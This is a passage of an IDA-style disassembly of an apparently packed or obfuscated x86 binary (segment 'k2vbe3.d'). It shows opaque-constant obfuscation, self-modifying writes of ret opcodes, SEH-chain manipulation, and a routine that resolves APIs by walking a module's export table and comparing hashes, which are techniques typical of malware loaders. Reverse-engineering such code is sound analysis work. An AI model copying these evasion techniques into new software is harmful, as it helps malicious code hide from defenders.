		jmp	loc_458E18
; ---------------------------------------------------------------------------
		not	ecx
		or	edi, 444E6BEDh
		jmp	sub_44AD44
; ---------------------------------------------------------------------------

loc_43D1D5:				; DATA XREF: sub_45234F-13514o
		add	edi, 0CD2D5383h
		xchg	edi, [esp]
		jmp	sub_43C04E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4506C3

loc_43D1E3:				; CODE XREF: sub_4506C3:loc_449FD0j
		jz	loc_444349
		jmp	loc_452602
; END OF FUNCTION CHUNK	FOR sub_4506C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445541

loc_43D1EE:				; CODE XREF: sub_445541+C0DCj
		jns	loc_44266B
		adc	ebx, 113813F6h
		add	edx, 63C16A8Fh
		adc	ebp, ebx
		jno	loc_45B955
		jmp	loc_43D535
; END OF FUNCTION CHUNK	FOR sub_445541
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED1F

loc_43D20D:				; CODE XREF: sub_43ED1F:loc_45BA0Aj
		push	edi
		push	8B9F69FDh
		pop	edi
		or	edi, 0C92889B8h
		xor	edi, 0DD3816F8h
		add	edi, 0E9BD5452h
		xchg	edi, [esp+4+var_4]
		jmp	loc_45296B
; END OF FUNCTION CHUNK	FOR sub_43ED1F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E73

loc_43D22E:				; CODE XREF: sub_443E73+10968j
		jnz	loc_449848
		xchg	eax, [edi]
		xchg	edx, esi
		xchg	edx, [esi]
		jmp	loc_449848
; END OF FUNCTION CHUNK	FOR sub_443E73
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C297

loc_43D23F:				; CODE XREF: sub_44C297+8j
		call	sub_44B44A
; END OF FUNCTION CHUNK	FOR sub_44C297

; =============== S U B	R O U T	I N E =======================================



sub_43D244	proc near		; CODE XREF: sub_45A4C1-2356j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043F3DC SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044432A SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044E56C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A176 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AE5D SIZE 00000012 BYTES

		push	ebx
		push	118C0CF6h
		rol	ebx, 0Fh
		jmp	loc_44432A
sub_43D244	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_43D252:				; CODE XREF: sub_443FC1+8EC2j
		shr	edx, 1Dh
		pushf
		jg	loc_4599E0
		or	ebx, ebp

loc_43D25E:				; CODE XREF: sub_443FC1:loc_456B29j
		pop	ecx
		xchg	esi, [esp+0]
		mov	ebp, esi
		jmp	loc_44FBAD
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------

loc_43D269:				; CODE XREF: k2vbe3.d:00459CC4j
		xor	ebp, 6B3F3AB9h

loc_43D26F:				; CODE XREF: k2vbe3.d:loc_459CB8j
		add	esi, 4042B07Ch
		xchg	esi, [esp]
		jmp	loc_4549DE
; ---------------------------------------------------------------------------

loc_43D27D:				; CODE XREF: k2vbe3.d:loc_44D58Fj
		pop	esi
		mov	eax, [esp]
		push	edx
		call	sub_445047
		mov	eax, 7DA6ACC0h
		call	sub_4553CC
		jmp	loc_43F3D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BB73

loc_43D296:				; CODE XREF: sub_44BB73+8j
		pop	ebp
		pop	edi
		mov	eax, ds:dword_43FAA8
		or	eax, eax
		jnz	loc_4584C1
		jmp	loc_450642
; END OF FUNCTION CHUNK	FOR sub_44BB73
; ---------------------------------------------------------------------------
		push	0EEE491FFh
		pop	eax
		or	eax, ds:4000EDh
		add	eax, 611754ECh
		test	eax, 10000h

loc_43D2C3:				; CODE XREF: k2vbe3.d:00447638j
		jmp	loc_44500F
; ---------------------------------------------------------------------------

loc_43D2C8:				; DATA XREF: sub_443246+7o
		push	68E73F4Bh
		pop	eax
		add	eax, 8C53A030h
		sub	eax, 0CD24DC7Ch
		rol	eax, 2
		jmp	loc_4489BC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441409

loc_43D2E2:				; CODE XREF: sub_441409-3A2Aj
		jl	loc_456518
		rol	esi, 2
		jmp	loc_44B111
; END OF FUNCTION CHUNK	FOR sub_441409
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452ECC

loc_43D2F0:				; CODE XREF: sub_452ECC+7C63j
		add	eax, 0E9AB76h
		sub	eax, 0B2DC02EAh
		add	eax, 8826A809h
		call	sub_4553CC
		mov	ds:off_41E090, eax
		lea	eax, sub_452ECC
		mov	byte ptr [eax],	0C3h

loc_43D316:				; CODE XREF: k2vbe3.d:00440D50j
		jmp	loc_44B89D
; END OF FUNCTION CHUNK	FOR sub_452ECC

; =============== S U B	R O U T	I N E =======================================



sub_43D31B	proc near		; CODE XREF: sub_414C86+8p
					; k2vbe3.d:0044EAF2j
					; DATA XREF: ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00440FC9 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044500A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004487A0 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044B1D3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BC46 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044EAFD SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004506E3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004525BD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00455101 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00459D30 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045A62C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045A7ED SIZE 00000005 BYTES

		push	esi

loc_43D31C:				; CODE XREF: sub_43D023:loc_446B47j
		jmp	loc_455101
sub_43D31B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43D321:				; CODE XREF: k2vbe3.d:00452A08j
		mov	edi, [esi]
		not	ebx

loc_43D325:				; CODE XREF: k2vbe3.d:loc_450F1Ej
		push	0B920C73h
		sbb	ecx, esi
		jmp	loc_43D4E9
; ---------------------------------------------------------------------------

loc_43D331:				; CODE XREF: k2vbe3.d:0044F2BBj
		add	esi, 25F5ACF7h
		xchg	ebx, [ebp+0]
		jmp	loc_4538BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_43D33F:				; CODE XREF: sub_4467A1+156D5j
		jnz	loc_441CEC
		jmp	loc_43C6C7
; END OF FUNCTION CHUNK	FOR sub_4467A1
; ---------------------------------------------------------------------------

loc_43D34A:				; CODE XREF: k2vbe3.d:loc_45AA47j
		pop	ecx
		xor	ecx, 3AF1B135h
		add	ecx, 241EEDF0h
		mov	[ecx], eax
		jmp	loc_43C922
; ---------------------------------------------------------------------------

loc_43D35E:				; CODE XREF: k2vbe3.d:0044B69Fj
		pop	ecx
		add	ecx, 38D530A4h
		sub	ecx, 45D010F0h
		add	ecx, 8EF1507Eh
		mov	[ecx], eax
		pop	ecx
		lea	eax, nullsub_483
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_483
; ---------------------------------------------------------------------------

loc_43D382:				; DATA XREF: sub_43FE2A-10B7o
		jz	loc_442FDC
		mov	edx, [ebx+ecx]
		xor	edx, [ebx+ecx+4]
		cmp	edx, 7C61090Eh
		jz	loc_4475B6
		jmp	loc_454F7E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE2A

loc_43D3A0:				; CODE XREF: sub_43FE2A:loc_446F05j
		mov	ebx, [eax+18h]
		mov	ecx, [ebx+3Ch]
		mov	ecx, [ebx+ecx+78h]
		jmp	loc_449DB0
; END OF FUNCTION CHUNK	FOR sub_43FE2A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F26C

loc_43D3AF:				; CODE XREF: sub_43F26C+9192j
		dec	eax
		push	offset loc_450E49
		jmp	loc_43DAE4
; END OF FUNCTION CHUNK	FOR sub_43F26C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448B5E

loc_43D3BA:				; CODE XREF: sub_448B5E:loc_441728j
					; k2vbe3.d:00441742j
		add	ecx, 91D0ED87h
		xchg	ecx, [esp+8+var_8]
		jmp	sub_444FB1
; END OF FUNCTION CHUNK	FOR sub_448B5E
; ---------------------------------------------------------------------------
		mov	[eax], ebp
		jmp	sub_4481FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_43D3CF:				; CODE XREF: sub_456666:loc_44A6F3j
		mov	[ebp-1Ch], eax
		inc	dword ptr [ebp-20h]
		mov	eax, [ebp-1Ch]
		mov	eax, ds:dword_445648[eax*4]
		mov	[ebp-8], eax
		cmp	dword ptr [ebp-8], 0
		jmp	loc_458B37
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507E3

loc_43D3EB:				; CODE XREF: sub_4507E3:loc_440997j
		test	edx, 10000h
		jmp	loc_44FAC7
; END OF FUNCTION CHUNK	FOR sub_4507E3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FCA0

loc_43D3F6:				; CODE XREF: sub_43FCA0:loc_44EE72j
		or	ebx, 415911BFh
		jmp	loc_44FB3A
; END OF FUNCTION CHUNK	FOR sub_43FCA0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440EE3

loc_43D401:				; CODE XREF: sub_440EE3+FD3Ej
		mov	edx, [esp+0]
		push	eax
		mov	eax, edx
		call	sub_44367E
		mov	eax, [esp+4+var_4]
		push	edi
		push	offset sub_43DFE1
		jmp	nullsub_260
; END OF FUNCTION CHUNK	FOR sub_440EE3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ACAE

loc_43D41A:				; CODE XREF: sub_45ACAE+26j
		add	edx, 6A7ED356h
		add	edx, ebp
		add	edx, 0BB05CF3Bh
		mov	edx, [edx]
		shr	edx, 3
		push	offset loc_4433B6
		jmp	nullsub_393
; END OF FUNCTION CHUNK	FOR sub_45ACAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445593

loc_43D437:				; CODE XREF: sub_445593+10j
		xor	eax, 9A160411h
		rol	eax, 0Ah
		sub	eax, 1F4E9B09h
		add	eax, 3A65A68Fh
		popf
		push	ebx
		pushf
		push	51B45EBFh
		jmp	loc_4526BC
; END OF FUNCTION CHUNK	FOR sub_445593
; ---------------------------------------------------------------------------

loc_43D459:				; CODE XREF: k2vbe3.d:0044EDA7j
		jnb	loc_44F090

; =============== S U B	R O U T	I N E =======================================



sub_43D45F	proc near		; CODE XREF: sub_451222:loc_44AE5Dp

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 004405D9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448322 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004493A1 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004497B0 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044A7EA SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0044FED4 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00450938 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00459A2A SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		add	eax, edi
		pop	edi
		jb	loc_44A7EA
		xor	eax, 0CE0554FAh
		ror	eax, 0Ah
		jmp	loc_4497B0
sub_43D45F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43D47A:				; CODE XREF: k2vbe3.d:0044440Fj
		shl	edx, 16h
		cmp	edi, 96BDA98Ah
		jmp	loc_43F32D

; =============== S U B	R O U T	I N E =======================================



sub_43D488	proc near		; CODE XREF: k2vbe3.d:00449F8Fj
					; sub_4503D6+B4C9p

; FUNCTION CHUNK AT 0044A0B2 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	eax, ds:dword_44286C
		or	eax, eax
		jnz	loc_44A0B2
		jmp	loc_453AEE
sub_43D488	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD42

loc_43D49F:				; CODE XREF: sub_45AD42:loc_444D9Fj
		push	1FE9C692h
		pop	ecx
		and	ecx, ds:4000F2h
		test	ecx, 80000000h
		jmp	loc_44198C
; END OF FUNCTION CHUNK	FOR sub_45AD42
; ---------------------------------------------------------------------------
		mov	ds:off_41E040, eax
		lea	eax, sub_446258
		mov	byte ptr [eax],	0C3h
		jmp	sub_446258
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446258

loc_43D4CA:				; CODE XREF: sub_446258:loc_4581AAj
		mov	eax, [esp+0]
		push	edx
		jmp	loc_44FC79
; END OF FUNCTION CHUNK	FOR sub_446258
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FECA

loc_43D4D3:				; CODE XREF: sub_43FECA+6j
					; k2vbe3.d:loc_440615j	...
		xchg	eax, edx
		call	sub_45B20A
		retn
; END OF FUNCTION CHUNK	FOR sub_43FECA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442C22

loc_43D4DA:				; CODE XREF: sub_442C22+5E89j
		jmp	loc_44156C
; END OF FUNCTION CHUNK	FOR sub_442C22
; ---------------------------------------------------------------------------
		db 66h
dword_43D4E0	dd 0			; DATA XREF: k2vbe3.d:loc_43EEB6r
					; k2vbe3.d:00456F15w
; ---------------------------------------------------------------------------

loc_43D4E4:				; CODE XREF: k2vbe3.d:004430F7j
		jmp	loc_4525F5
; ---------------------------------------------------------------------------

loc_43D4E9:				; CODE XREF: k2vbe3.d:0043D32Cj
		jmp	loc_44D19D
; ---------------------------------------------------------------------------
		dw 6883h
dword_43D4F0	dd 0AF646AABh, 0C8E2C833h ; DATA XREF: sub_43FECA+169DCo
					; k2vbe3.d:00456B0Fo
		db 0C6h, 6Ch, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447692

loc_43D4FB:				; CODE XREF: sub_447692+6j
		jmp	loc_43C7C7
; END OF FUNCTION CHUNK	FOR sub_447692
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441109

loc_43D500:				; CODE XREF: sub_441109+7j
		jmp	loc_43FB95
; END OF FUNCTION CHUNK	FOR sub_441109
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_296. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		sbb	ebp, 0C8DF0880h
		jmp	sub_4488E3
; ---------------------------------------------------------------------------
		add	ebp, edx
		jmp	sub_4580F6
; ---------------------------------------------------------------------------

loc_43D518:				; DATA XREF: sub_442700-358Bo
		lea	eax, loc_4596BD
		call	sub_43CF1B
; START	OF FUNCTION CHUNK FOR sub_45A4D8

loc_43D523:				; CODE XREF: sub_45A4D8+1j
		jmp	loc_448686
; END OF FUNCTION CHUNK	FOR sub_45A4D8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444A86

loc_43D528:				; CODE XREF: sub_444A86+Cj
		jmp	nullsub_34
; END OF FUNCTION CHUNK	FOR sub_444A86
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4570C0

loc_43D52D:				; CODE XREF: sub_4570C0:loc_44C4D7j
		xchg	edx, [esp+0]
		jmp	loc_44ED37
; END OF FUNCTION CHUNK	FOR sub_4570C0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445541

loc_43D535:				; CODE XREF: sub_445541-8339j
					; sub_445541:loc_451615j
		or	ecx, 0E769749Fh
		rol	ecx, 1
		add	ecx, 314EB57Fh
		xchg	ecx, [esp+4+var_4]
		jmp	loc_454CDF
; END OF FUNCTION CHUNK	FOR sub_445541
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4454EF

loc_43D54B:				; CODE XREF: sub_4454EF:loc_4404E5j
		pop	eax
		rol	eax, 4
		sub	eax, 6CC6BDF5h
		cmp	eax, 0DB220935h

loc_43D55B:				; CODE XREF: sub_453347:loc_4495F7j
		jmp	loc_43C079
; END OF FUNCTION CHUNK	FOR sub_4454EF
; ---------------------------------------------------------------------------
		add	esi, 87AD4E49h
		jmp	loc_454ACF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446258

loc_43D56B:				; CODE XREF: sub_446258+14E28j
		jl	loc_44324A
		pushf
		jmp	loc_44560A
; END OF FUNCTION CHUNK	FOR sub_446258
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441885

loc_43D577:				; CODE XREF: sub_441885+86CFj
		js	loc_456DF6
		sbb	ebp, ebx
		sub	ebp, edx
		adc	ebx, eax

loc_43D583:				; CODE XREF: k2vbe3.d:0043F4AEj
					; sub_444D7B+48BFj ...
		pop	ecx
		pop	ebp
		jmp	nullsub_408
; END OF FUNCTION CHUNK	FOR sub_441885
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_43D58A:				; CODE XREF: sub_440C94-4644j
		xor	ebx, 0AAA893A9h
		xchg	eax, edi
		or	eax, 0B6E00F2Ah
		xor	edi, esi

loc_43D59A:				; CODE XREF: sub_440C94:loc_45B9A1j
		mov	eax, [ebp+var_4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44A8A4
		jmp	loc_452361
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A0D7

loc_43D5AB:				; CODE XREF: sub_44A0D7:loc_44B485j
		sub	eax, 2BCFF09h
		add	eax, 0FFDCBC07h
		xor	eax, 997F3B61h
		add	eax, ebp
		add	eax, 0AD3C8255h
		cmp	dword ptr [eax], 47424454h
		jnz	loc_445384
		jmp	loc_44AD87
; END OF FUNCTION CHUNK	FOR sub_44A0D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6BD

loc_43D5D6:				; CODE XREF: sub_44A6BD+6BBDj
		call	sub_4479A1
		mov	eax, 20413B0Fh
		push	esi
		or	esi, 0E12684D6h
		jmp	loc_4505BA
; END OF FUNCTION CHUNK	FOR sub_44A6BD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_92. PRESS	KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_56. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43D5EE:				; CODE XREF: k2vbe3.d:004568CFj
		jmp	loc_443D4E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_43D5F3:				; CODE XREF: sub_447E07:loc_456D00j
		add	edx, 0C331927Ah
		add	edx, ebp
		add	edx, 36AC1514h
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_447F9C
		jmp	loc_44F54C
; END OF FUNCTION CHUNK	FOR sub_447E07

; =============== S U B	R O U T	I N E =======================================



sub_43D612	proc near		; DATA XREF: sub_4568F5:loc_45B371o

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00445640 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004505FE SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004519BC SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00456A7D SIZE 00000005 BYTES

		push	esi
		push	9FD65D9h
		xchg	edi, [esp+8+var_8]
		mov	esi, edi
		pop	edi
		rol	esi, 1Ch
		xor	esi, 0E8B7A640h
		jmp	loc_445640
sub_43D612	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_141. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD42

loc_43D62D:				; CODE XREF: sub_45AD42:loc_441992j
		call	sub_43C04E
		test	al, al
		jz	loc_44E57C
		jmp	loc_4455E9
; END OF FUNCTION CHUNK	FOR sub_45AD42
; ---------------------------------------------------------------------------
		mov	dword ptr [ebp-4], 1
		push	44567351h
		pop	eax
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_43D64C:				; CODE XREF: sub_4580DF:loc_455B48j
		and	eax, 3720C222h
		sub	eax, 49C6F75h
		xor	eax, 16D3ADD0h
		sub	eax, 0B7FE42BDh
		add	eax, 0CE4DC362h
		jmp	loc_44E8B9
; END OF FUNCTION CHUNK	FOR sub_4580DF

; =============== S U B	R O U T	I N E =======================================



sub_43D66F	proc near		; CODE XREF: k2vbe3.d:0044E6E7p
					; k2vbe3.d:00453D13j
		xchg	esi, [esp+0]
sub_43D66F	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44945C

loc_43D672:				; CODE XREF: sub_44945C+825Ej
		pop	esi
		push	ebp
		mov	ebp, esp
		push	offset loc_458759
		jmp	nullsub_420
; END OF FUNCTION CHUNK	FOR sub_44945C
; ---------------------------------------------------------------------------

loc_43D680:				; CODE XREF: k2vbe3.d:loc_451878j
					; DATA XREF: sub_449CAB+7BC3o
		mov	[ebx], eax
		pop	ebx
		lea	eax, loc_4593B7
		mov	byte ptr [eax],	0C3h
		jmp	loc_45234A
; ---------------------------------------------------------------------------

loc_43D691:				; DATA XREF: sub_450CBF:loc_44A74Eo
		jmp	loc_4402E7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450CBF

loc_43D696:				; CODE XREF: k2vbe3.d:004555DCj
					; sub_450CBF+56E9j
		pop	ecx
		xchg	edx, [esp-4+arg_0]
		mov	ebp, edx
		xchg	eax, [esp-4+arg_0]
		mov	edx, eax
		pop	eax
		jmp	loc_451BFA
; END OF FUNCTION CHUNK	FOR sub_450CBF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456C15

loc_43D6A7:				; CODE XREF: sub_456C15:loc_4570F7j
					; sub_456C15+4F4j
		and	ebx, ds:4000EDh
		add	ebx, 503AD181h
		and	ebx, 0E82C85DFh
		add	ebx, 0C01DA394h
		xchg	ebx, [esp+0]
		jmp	sub_45B20A
; END OF FUNCTION CHUNK	FOR sub_456C15
; ---------------------------------------------------------------------------

loc_43D6C7:				; CODE XREF: k2vbe3.d:00454E63j
		jl	loc_43C270
		sbb	ecx, edi
		adc	ecx, 863269B4h
		sbb	edx, 92924D61h
		adc	edx, ecx
		jmp	loc_43C26A
; ---------------------------------------------------------------------------
		push	ecx
		push	497D7818h
		pop	ecx
		or	ecx, 0AA5CF13Eh
		rol	ecx, 8
		add	ecx, 3CB0A8FBh
		jmp	loc_43E8EC
; ---------------------------------------------------------------------------

loc_43D6FD:				; DATA XREF: sub_447C43-16EFo
		add	eax, ebp
		add	eax, 8BF779FFh
		mov	eax, [eax]
		mov	dword ptr [ebp+eax*4-70h], 73257325h
		inc	dword ptr [ebp-8]

loc_43D712:				; CODE XREF: k2vbe3.d:00457A6Aj
		cmp	dword ptr [ebp-8], 19h
		jnz	loc_44AA82
		jmp	loc_44697F
; ---------------------------------------------------------------------------

loc_43D721:				; CODE XREF: k2vbe3.d:loc_45552Bj
		jz	loc_440528
		jmp	loc_45411F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4523BE

loc_43D72C:				; CODE XREF: sub_4523BE:loc_447789j
		jnz	loc_453041
		jz	loc_45A3C9
		not	ebx
		jmp	loc_45303F
; END OF FUNCTION CHUNK	FOR sub_4523BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B4EE

loc_43D73F:				; CODE XREF: sub_45B4EE:loc_4451D5j
		js	loc_44D9D7
; END OF FUNCTION CHUNK	FOR sub_45B4EE
; START	OF FUNCTION CHUNK FOR sub_4479A1

loc_43D745:				; CODE XREF: sub_4479A1-644j
		jmp	nullsub_164
; END OF FUNCTION CHUNK	FOR sub_4479A1
; ---------------------------------------------------------------------------
		mov	[ecx], eax
		cdq
		adc	ebx, 7439C7E2h
		push	eax
		jmp	loc_43EBF5
; ---------------------------------------------------------------------------

loc_43D759:				; DATA XREF: sub_44A1B1:loc_445E69o
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-1Ch], 0F6h
		jz	loc_458DF8
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-1Ch], 0F7h
		jnz	loc_441C00
		jmp	loc_458DF8
; ---------------------------------------------------------------------------

loc_43D77E:				; DATA XREF: sub_454E83-152A0o
		xchg	eax, [esp]
		jmp	loc_4525A7

; =============== S U B	R O U T	I N E =======================================



sub_43D786	proc near		; CODE XREF: sub_451CCE-1378Dj

; FUNCTION CHUNK AT 0045336F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004536FB SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00459F15 SIZE 00000005 BYTES

		push	ebx
		push	0E4EB19Ch

loc_43D78C:				; CODE XREF: k2vbe3.d:loc_456BD6j
		pop	ebx
		and	ebx, 919065ABh
		xor	ebx, 299A811Dh
		sub	ebx, 0C93E0AFDh
		jmp	loc_45336F
sub_43D786	endp

; ---------------------------------------------------------------------------

loc_43D7A4:				; CODE XREF: k2vbe3.d:0045AAD5j
		push	17D52DBAh

; =============== S U B	R O U T	I N E =======================================



sub_43D7A9	proc near		; CODE XREF: sub_44A056+Ap

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043F328 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F876 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00440983 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440AAF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447A1E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044BE04 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DB8D SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044E0E0 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00453C43 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00454021 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004540A4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454B97 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00456275 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B2FC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B529 SIZE 0000000B BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	eax, ebp
		jmp	loc_440983
sub_43D7A9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43D7B4:				; CODE XREF: k2vbe3.d:004474B4j
		shr	ebp, 1Dh
		mov	edx, [ecx]

loc_43D7B9:				; CODE XREF: k2vbe3.d:loc_450D8Cj
		pop	large dword ptr	fs:0
		add	esp, 4
		jmp	loc_43DB22
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E83

loc_43D7C8:				; CODE XREF: sub_454E83:loc_43C34Dj
		test	ecx, 0E0BFDE35h
		jmp	loc_455A09
; END OF FUNCTION CHUNK	FOR sub_454E83
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441409

loc_43D7D3:				; CODE XREF: sub_441409+1101Cj
		add	ebx, 6F4E99DDh
		xchg	ebx, [esp+0]
		jmp	loc_440A5C
; END OF FUNCTION CHUNK	FOR sub_441409
; ---------------------------------------------------------------------------

loc_43D7E1:				; CODE XREF: k2vbe3.d:00450E44j
		jl	loc_44F0B3
		adc	edi, ebp
		jmp	loc_458341
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D942

loc_43D7EE:				; CODE XREF: sub_43D942:loc_45B471j
		push	0C84144C6h
		pop	edx
		sub	edx, 0F128BDCDh
		jb	loc_440798
		cdq
		jmp	loc_440784
; END OF FUNCTION CHUNK	FOR sub_43D942
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_43D806:				; CODE XREF: sub_44C90E-7440j
		push	0DC53DF1Ch
		pop	edx
		xor	edx, ds:4000EDh
		cmp	edx, 3D985F0Eh
		jmp	loc_453B4E
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_43D81D:				; CODE XREF: k2vbe3.d:00440C44j
		pushf
		jmp	loc_44292F

; =============== S U B	R O U T	I N E =======================================



sub_43D823	proc near		; CODE XREF: sub_44B979:loc_4463A9p
					; k2vbe3.d:004528DBj

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C8A9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F99F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443BC1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444625 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044743C SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00447C3C SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044C18B SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044D7F2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454600 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004554D2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455B95 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00456762 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457184 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457738 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00459A15 SIZE 00000005 BYTES

